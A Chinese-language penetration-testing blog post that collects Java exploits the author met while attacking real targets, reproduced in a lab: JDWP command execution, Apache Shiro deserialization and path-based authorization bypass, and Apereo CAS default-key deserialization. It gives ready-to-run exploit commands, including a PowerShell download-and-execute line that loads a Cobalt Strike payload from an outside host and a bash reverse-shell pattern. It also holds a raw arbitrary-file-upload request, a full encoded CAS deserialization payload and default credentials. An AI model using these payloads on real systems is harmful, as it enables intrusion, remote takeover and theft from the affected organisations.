前言
实际打点过程中遇到大量java相关的漏洞,在尚未熟悉java之前,做不了漏洞分析,这里先对实战中遇到的相关漏洞进行整理。
JDWP 远程命令执行
漏洞简介
JDWP 是JVM虚拟机支持的一种远程调式协议,在远程调式的时候使用。如果开启了一个调试端口的JAVA应用,就有可能利用JDWP进行远程调式来执行命令。
漏洞复现
在启动tomcat时的startup.bat配置文件中,首行添加如下命令:
SET CATALINA_OPTS=-server -Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000
即可在8000端口上开启JDWP协议。
再次查看本地开放端口。
指纹
利用nmap扫描该端口
nmap -Pn -A -T4 10.211.55.31 -p 8000 -v
image.png
证明使用JDWP 协议
利用方法
利用 jdwp-shellifier 脚本可执行命令。
python jdwp-shellifier.py -t 10.211.55.31 -p 8000 --break-on "java.lang.String.indexof" --cmd "ping -c 1 nts6in.dnslog.cn"
image.png
出现Runtime.exec() successful
表示利用该方法执行命令成功。
windows 平台可通过cobaltstrike的powershell一句话直接上线。
python jdwp-shellifier.py -t 10.211.55.19 -p 8000 --break-on "java.lang.String.indexof" --cmd "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://xxx:83/a'))\""
image.png
linux 平台可通过{echo,base64编码反弹shell}|{base64,-d}|{bash,-i}
反弹上线。
也可以利用metasploit的multi/misc/java_jdwp_debugger 模块,使用的时候注意区分是windows系统还有linux系统,以及木马的易查杀问题。
image.pngshiro 反序列化
漏洞简介
Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。
shiro默认使用的AES的密钥为硬编码,导致攻击者可以构造恶意数据造成反序列化RCE漏洞。
影响版本:shiro<=1.2.4
漏洞复现
部署war包即可。
image.png指纹
header="rememberme=deleteMe"
也是推荐pmiaowu师傅的 https://github.com/pmiaowu/BurpShiroPassiveScan 被动式扫描插件。
利用方式
目前检测shiro漏洞的工具也都很成熟了。这里推荐二款工具,使用起来也很简单。
如:https://github.com/feihong-cs/ShiroExploit-Deprecated
如:https://github.com/wyzxxz/shiro_rce_tool
image.pngshiro 权限绕过
漏洞简介
shiro的权限绕过,是shiro对uri的解析规则和后端开发框架的解析规则不一样所导致的。
漏洞复现
如FHAdmin 框架使用了shiro,可以通过;/
的方式进行绕过并任意文件上传。
指纹
header="rememberme=deleteMe"
利用方式
如FH Admin 框架就存在该漏洞。
POST /;a/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/ HTTP/1.1
Host: xxxxxx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1
Accept-Encoding: gzip, deflate
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8Connection: close
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Length: 176
Content-Type: multipart/form-data; boundary=653e1298053b919b8c365d524e9c45b3
--653e1298053b919b8c365d524e9c45b3
Content-Disposition: form-data; name="imgFile"; filename="loginc.txt"
Content-Type: image/jpeg
123
--653e1298053b919b8c365d524e9c45b3--
可任意文件上传。上传后保存在应用目录的/plugins/uploadify/下,且uploadPath可任意修改。
Apereo CAS 反序列化
漏洞简介
Apereo CAS 是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。在4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发反序列化漏洞。
漏洞复现
下载war包
https://mvnrepository.com/artifact/org.jasig.cas/cas-server-webapp/4.1.1
直接部署到tomcat的webapps下即可。
指纹
title="CAS – Central Authentication Service"
ico 图标
利用方式
默认账号/密码:casuser/Mellon
下载 https://github.com/potats0/CasExp 源码,输出payload,方便在数据包查看。
然后maven重新打包即可。
如果导sun.misc.BASE64Encoder 包时出现错误。可以尝试在Build Path中,Add External Jars添加 %JAVA_HOME%\jre\lib\rt.jar 这个包解决。
因为execution参数由默认秘钥构造的反序列化,每次传入不同的命令值也会相应变化。
故这里抽取出相关参数,手动构造数据包。记得URL编码。
具体数据包如下:
POST /cas-server-webapp-4.1.1/login;jsessionid=B662B67C75F008130B38E70A83F6CAF3 HTTP/1.1
Host: 10.211.55.31:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 9213
Origin: http://10.211.55.31:8080
Connection: close
Referer: http://10.211.55.31:8080/cas-server-webapp-4.1.1/login
Cookie: JSESSIONID=B662B67C75F008130B38E70A83F6CAF3; bdshare_firstime=1629255297080; UM_distinctid=17ba5ad750853c-0ca62b52d638d9-445c6e-1aeaa0-17ba5ad7509258; CNZZDATA80862620=cnzz_eid%3D843992321-1630513214-%26ntime%3D1630513214
Upgrade-Insecure-Requests: 1
username=13222233322&password=Test1234<=LT-215706-O4ejY5ldDQpHMB9WdQbe0trNaM28Wf-cas01.example.org&execution=7b951c2a-e78f-4286-95fe-970782352a84_%41%41%41%41%49%67%41%41%41%42%43%59%43%74%54%54%4a%63%32%77%35%46%64%62%7a%68%2b%74%43%57%69%67%41%41%41%41%42%6d%46%6c%63%7a%45%79%4f%4c%35%34%46%37%64%68%6b%77%67%50%56%43%5a%74%65%48%47%73%2f%49%34%53%2b%53%6c%2f%32%6e%67%6a%48%70%51%51%46%37%50%55%57%79%2b%72%34%31%43%73%54%48%37%64%37%4e%58%43%72%36%36%76%57%6a%54%6e%61%61%74%67%7a%6d%41%6b%44%36%41%68%45%2b%61%70%72%46%51%66%74%6a%77%67%34%6e%69%72%57%79%7a%34%38%43%38%31%71%58%48%70%70%76%38%6a%71%4c%72%6f%6e%35%50%75%45%43%33%33%56%37%4b%2b%53%48%67%32%57%4f%59%4b%42%4b%41%38%49%2b%4b%48%67%46%41%33%31%51%4e%55%2b%6c%66%42%4f%36%76%6d%43%57%36%61%6a%64%32%69%6f%35%2b%39%67%61%79%6c%50%30%74%2f%46%39%57%6d%32%64%68%36%63%50%49%63%7a%67%44%6d%73%57%35%4b%72%4f%57%38%7a%35%6b%4f%38%78%75%31%5a%38%31%56%2b%33%52%74%30%6b%78%2b%6b%71%35%5a%45%50%68%4d%6b%75%46%52%6c%6d%49%67%62%71%54%56%59%48%67%44%74%38%6f%69%49%31%41%4a%78%4f%70%45%71%6c%71%58%63%50%30%56%49%79%49%36%70%56%54%61%75%62%63%47%73%68%4e%32%78%45%4e%6a%6d%72%6c%37%55%46%6a%50%36%4b%5a%70%79%34%68%71%45%48%71%46%33%45%47%69%58%38%72%51%56%53%56%74%52%6d%54%48%6e%6f%47%70%5a%6b%4b%6c%31%62%66%59%54%34%7a%4f%74%34%30%36%6a%77%4d%30%72%79%47%67%72%55%49%6a%73%71%6d%6a%61%2f%35%43%66%4f%4c%66%33%62%53%4f%74%44%32%58%63%41%54%4a%2b%69%37%44%4b%2f%7a%51%76%35%65%46%4e%34%61%6f%44%44%32%34%75%77%4b%66%69%32%37%46%4a%53%52%48%77%48%6f%64%48%4f%4a%71%68%36%48%73%2b%31%4c%41%78%73%48%6e%77%2b%69%58%2b%32%70%43%31%51%53%33%6f%50%71%43%77%6e%4e%58%34%72%69%45%4c%45%4e%38%63%6d%5a%55%30%39%5a%71%2b%33%5a%48%6c%76%6b%79%6d%32%4a%38%58%47%4d%61%66%4a%4c%4c%70%78%46%6d%4b%43%76%61%47%5a%46%79%4d%37%6e%2f%36%6f%67%79%58%2b%75%37%4a%6e%43%46%74%37%30%4e%41%39%37%42%39%57%49%52%67%42%36%6b%34%45%44%6a%4b%64%33%45%78%63%5a%64%36%48%53%6b%33%33%70%36%53%50%6d%6e%50%4e%64%59%32%34%4e%42%48%6b%75%70%37%6f%6a%33%38%77%62%36%4c%38%6c%53%41%53%66%31%61%46%76%46%55%32%46%77%6d%74%6f%71%74%6c%69%65%66%6c%68%4d%34%65%34%4f%4d%4c%69%68%79%61%4a%6a%4b%52%50%76%59%34%68%54%42%4a%6a%2b%44%72%6b%37%39%4e%49%53%49%69%65%53%67%6b%32%64%36%43%30%45%55%78%79%75%73%5a%31%30%56%5a%45%30%77%70%6f%47%35%59%43%31%35%6a%74%57%75%78%41%39%76%74%54%62%68%58%64%52%34%42%57%34%44%58%2f%69%62%67%4b%37%38%4a%70%6c%4d%70%6a%35%67%4e%2f%4a%59%79%4e%44%45%46%30%4e%64%78%37%38%59%61%6f%49%35%57%57%72%41%32%39%61%72%51%35%2f%76%50%61%77%6b%79%69%42%32%69%48%50%4f%33%57%49%37%56%2f%7a%51%35%50%6f%59%78%4b%44%72%4a%30%44%70%30%49%4e%35%37%39%6c%4b%66%75%67%55%59%45%44%73%2b%6c%35%62%57%6d%5a%59%33%55%6f%2f%4f%79%33%38%59%71%6a%47%47%50%4d%57%65%75%77%74%64%70%4c%34%6c%69%4f%59%34%58%37%30%77%34%63%54%45%5a%30%68%44%66%4e%75%73%72%43%70%53%71%45%53%50%59%4a%6a%6e%4d%6c%4d%4b%6f%6c%78%37%6f%4a%46%4d%70%42%71%7a%65%41%54%2f%4d%77%45%2f%6f%6f%76%74%63%39%76%66%50%48%62%76%47%56%59%53%65%51%43%66%76%77%6b%51%57%47%68%53%79%4e%37%36%4e%6b%38%31%56%72%33%65%42%48%38%75%48%45%53%76%37%71%76%6d%6d%63%35%45%65%62%70%41%77%6d%48%49%66%4a%73%76%55%6b%43%42%4d%4c%6a%4f%37%7a%53%2f%75%41%51%44%6f%6b%77%4f%54%63%54%46%61%73%53%73%37%70%52%37%66%54%62%53%42%4b%64%53%35%76%35%6a%36%37%66%58%46%78%44%65%42%78%37%30%50%49%65%39%51%30%55%51%58%2b%4f%74%56%2b%58%75%61%48%51%42%31%36%4b%70%74%32%79%62%79%4f%57%4e%6e%4b%35%56%47%57%78%37%38%58%6a%4b%70%56%31%73%63%58%46%33%4e%6c%43%74%4f%65%49%44%58%66%72%41%53%66%7a%4b%4f%6c%34%65%6f%79%6b%74%79%59%66%41%30%4f%70%51%43%38%67%36%55%4d%70%31%38%78%46%71%41%57%4c%43%2f%6c%70%65%64%42%6c%56%76%5a%61%68%68%76%76%4d%52%31%37%39%49%56%63%73%4b%55%38%67%35%50%37%38%32%34%32%59%59%64%48%37%51%77%6b%52%57%64%4d%42%46%4c%64%4c%4d%4e%4f%77%52%33%4a%41%75%4f%64%42%48%6c%38%5a%61%73%43%49%48%39%56%79%4e%59%7a%53%48%47%50%32%4b%74%58%4c%78%48%73%43%4f%4c%79%4f%7a%6f%38%4a%62%30%63%5a%58%77%4e%69%6e%51%4a%4e%6b%49%58%59%72%2f%77%58%45%48%63%79%77%63%63%7a%39%57%44%38%33%48%59%50%77%67%6f%73%76%56%62%4b%7a%42%55%48%2f%54%58%69%4e%41%48%35%65%31%45%61%53%67%65%42%79%47%64%32%64%5a%47%35%55%57%78%77%65%61%66%51%78%4e%65%6e%45%31%77%6c%65%64%35%53%30%67%6a%57%51%65%43%76%55%62%67%35%52%45%70%4b%71%35%6e%6a%52%62%61%63%38%49%64%67%52%53%77%58%46%4c%44%4e%46%35%62%48%42%30%6b%6c%48%51%6b%6a%46%37%66%62%39%44%5a%79%57%42%43%50%47%75%4c%56%35%2f%6d%76%2b%53%47%30%51%5a%4d%44%75%52%56%75%4f%39%38%4b%6c%6e%6d%4d%43%36%45%70%5a%49%4a%36%71%56%39%34%79%58%52%57%6e%35%35%55%50%7a%4c%51%64%71%32%79%61%5a%46%71%49%31%4b%72%2f%34%51%6e%4b%49%58%66%54%4a%4c%51%72%64%2b%4b%47%6a%54%34%65%49%61%57%71%4c%4c%33%62%4c%6a%57%63%4f%4b%74%6e%74%68%34%46%6e%41%57%52%36%47%67%4a%4f%77%4a%63%35%73%6e%41%73%48%44%6e%6f%4d%73%79%67%6d%7a%49%45%6b%5a%52%33%7a%71%4d%72%67%66%48%41%63%52%44%30%62%50%68%65%6a%32%33%50%34%6b%75%35%68%41%31%44%2b%74%6e%6a%71%52%34%4a%6c%42%51%47%56%6b%69%53%48%47%34%68%2b%34%54%56%68%4f%4c%72%37%6e%51%50%53%37%6a%30%33%6f%2f%49%58%34%78%44%58%6d%77%68%41%74%2f%48%30%31%73%46%67%50%42%53%65%39%76%75%71%78%41%35%53%38%4b%78%2f%46%59%6e%54%52%39%62%6a%79%47%49%72%68%50%70%57%67%47%68%38%51%72%63%33%51%66%6c%30%77%70%78%2f%74%48%68%52%69%52%7a%68%39%6b%36%2f%47%41%44%74%69%6c%72%48%58%55%42%63%39%62%6e%59%44%4a%6c%34%6e%4c%61%6d%52%53%50%64%55%69%4b%6a%78%4d%78%35%2f%79%51%62%59%65%2f%4e%63%58%45%32%32%39%77%58%56%76%4a%45%74%70%4f%77%37%57%34%49%52%45%45%34%35%33%34%45%72%49%6e%37%78%71%37%73%52%6c%31%56%44%33%62%7a%32%71%43%66%37%4a%74%52%4e%42%30%32%39%42%33%65%35%68%44%66%46%56%76%2f%74%38%30%4b%6f%33%70%4b%57%42%6a%6c%48%67%67%46%62%54%30%32%74%73%68%62%43%6f%65%37%72%42%44%4b%58%4f%58%74%7a%64%35%46%74%70%46%33%71%58%63%6a%57%71%78%49%56%54%48%50%62%54%56%67%75%44%34%70%5a%6c%49%5a%53%75%4c%59%75%70%43%4c%54%62%62%72%53%52%44%74%46%6e%67%4b%4f%4e%34%78%71%4f%4e%39%6e%4e%31%55%54%77%4f%2f%46%32%65%74%48%4a%65%49%65%61%74%73%79%41%64%58%67%48%59%45%58%33%45%71%6b%30%6d%6c%6d%33%72%6b%63%38%43%79%35%61%73%74%44%62%64%61%37%68%59%31%52%67%35%79%2b%37%67%34%31%76%45%62%42%6b%4f%6d%46%4d%33%48%54%6f%78%57%45%4d%2b%4f%56%31%62%73%76%53%32%4d%30%58%50%32%31%68%5a%34%32%2f%4d%63%70%48%4f%68%6e%69%4b%37%6e%62%52%70%75%4d%52%77%75%48%50%62%4d%39%47%4c%47%56%73%6b%4e%58%4b%34%61%2f%5a%47%58%4b%48%67%36%51%64%71%65%57%2f%63%75%68%6c%62%56%67%75%58%63%6a%62%45%6f%5a%44%6a%54%32%66%4d%36%59%73%63%65%65%5a%2f%70%38%6f%78%2b%53%2f%42%4c%49%76%30%2f%41%2b%51%4a%42%78%61%50%32%62%61%32%37%54%68%2f%4d%4f%6a%49%33%5a%76%6b%35%72%73%53%6f%52%31%48%67%39%6a%46%71%41%53%32%72%53%43%69%6a%79%67%51%68%75%6e%68%52%67%4a%59%4b%54%39%4e%61%6a%7a%73%31%6b%37%56%73%32%70%43%4a%6f%4e%7a%44%78%35%63%61%79%31%56%32%33%41%78%6b%38%50%33%44%31%62%6b%6f%47%64%77%66%39%71%6c%63%57%79%31%34%53%33%31%7a%39%73%65%65%47%6c%6b%4c%30%69%37%52%6b%67%64%6d%53%42%5a%2f%67%45%50%66%50%68%70%2b%38%50%63%65%69%6a%72%45%51%58%39%4a%49%56%5a%48%62%78%38%53%2b%38%55%6b%6d%4b%39%74%65%66%71%4e%55%53%44%4d%31%4a%41%32%78%41%49%76%58%6b%65%38%30%52%63%75%42%48%73%64%6f%6d%7a%39%31%72%63%66%72%69%79%2f%7a%6a%46%37%6c%66%33%38%79%57%36%49%52%69%72%44%77%52%62%36%61%39%36%39%41%4f%31%36%49%73%78%52%6a%61%78%35%5a%7a%57%70%59%45%69%62%75%6b%44%6a%68%75%2b%70%72%78%79%43%63%71%78%61%45%57%58%70%4e%38%2f%43%75%54%57%38%31%6b%77%68%48%64%6d%30%6b%43%32%4b%69%4f%54%45%77%34%79%74%4f%6b%76%35%59%34%73%50%37%62%70%30%54%6c%47%52%54%4d%65%6e%73%4a%63%79%43%41%38%5a%37%73%38%39%63%63%57%32%64%52%36%56%64%45%5a%43%70%69%64%63%4b%4b%51%46%6d%7a%69%43%69%36%35%4b%2b%4f%38%6b%30%47%69%78%6e%74%6a%6a%57%2b%62%64%4b%2b%66%38%6e%7a%65%66%64%36%61%43%77%79%6e%39%35%64%56%55%50%36%38%31%4b%2f%45%62%49%2f%52%52%45%73%62%31%61%2b%2f%55%73%43%39%71%6c%42%32%38%45%55%61%58%55%35%4c%6f%51%43%53%39%4d%67%64%75%59%6b%4b%79%55%58%56%50%58%6d%74%4b%6f%62%39%43%4e%64%7a%49%69%79%2f%56%48%73%57%70%4b%36%67%62%37%64%50%78%62%7a%38%77%78%45%44%52%58%4e%4f%71%45%74%2b%51%6f%74%66%45%61%41%72%61%4a%30%4e%72%4c%51%35%49%35%75%4e%32%49%78%4d%76%62%73%73%70%61%4d%43%2b%77%4a%68%58%6e%76%39%65%57%72%43%50%76%75%55%55%57%6d%45%49%68%6f%54%63%33%61%43%41%4f%44%65%2f%45%54%45%56%31%6b%57%44%73%48%37%67%30%2f%54%4f%38%39%67%58%55%6d%7a%65%49%31%6e%78%67%38%55%7a%6d%44%43%48%30%6f%55%50%53%4d%47%51%36%4b%7a%43%61%33%74%59%4c%35%50%74%47%65%47%76%55%66%48%4f%57%6e%6e%69%69%2b%65%32%66%33%4a%68%5a%53%35%4b%6a%6a%71%49%36%61%79%79%47%77%66%38%54%35%70%69%2f%53%6b%36%38%57%46%6f%31%71%68%34%46%58%46%7a%66%41%62%46%4d%52%4d%31%6e%76%6b%63%68%4c%2f%63%6d%48%5a%43%37%55%53%53%4f%31%72%4a%72%64%6d%36%64%72%4e%45%69%31%64%43%5a%63%33%48%79%75%30%46%51%70%2b%30%48%55%46%6e%47%47%46%39%4b%58%34%79%72%34%39%4f%39%71%50%35%75%72%79%41%4e%35%63%6a%73%69%63%59%76%76%32%69%33%54%45%4e%50%5a%56%34%47%59%4f%74%4a%6f%6e%51%35%4f%64%55%52%69%79%2b%38%6b%56%31%35%78%2f%6e%4f%5a%58%30%7a%74%4e%68%75%72%31%41%55%68%68%57%63%30%65%6b%53%38%66%47%52%49%4c%2f%56%58%62%54%33%42%50%63%4d%55%42%34%7a%32%41%76%50%43%79%68%4e%57%75%62%75%6a%42%75%54%2f%35%55%76%56%62%4a%4d%77%6b%6c%6e%63%34%6d%76%62%79%38%75%6a%34%65%36%52%6a%75%5a%2f%39%53%68%53%47%62%31%79%69%30%37%58%41%45%68%39%36%70%61%66%72%44%59%65%49%4c%55%66%4c%48%4f%71%63%65%49%67%56%4b%44%32%6e%6e%56%76%71%54%44%67%61%57%72%41%68%77%2b%48%43%78%64%5a%4d%51%3d&_eventId=submit&submit=LOGIN
image.png
总结
复现了jdwp命令执行、shiro框架的反序列化和权限绕过、cas反序列化四个不同的漏洞,也算是了解了java版本对漏洞利用的影响。
网友评论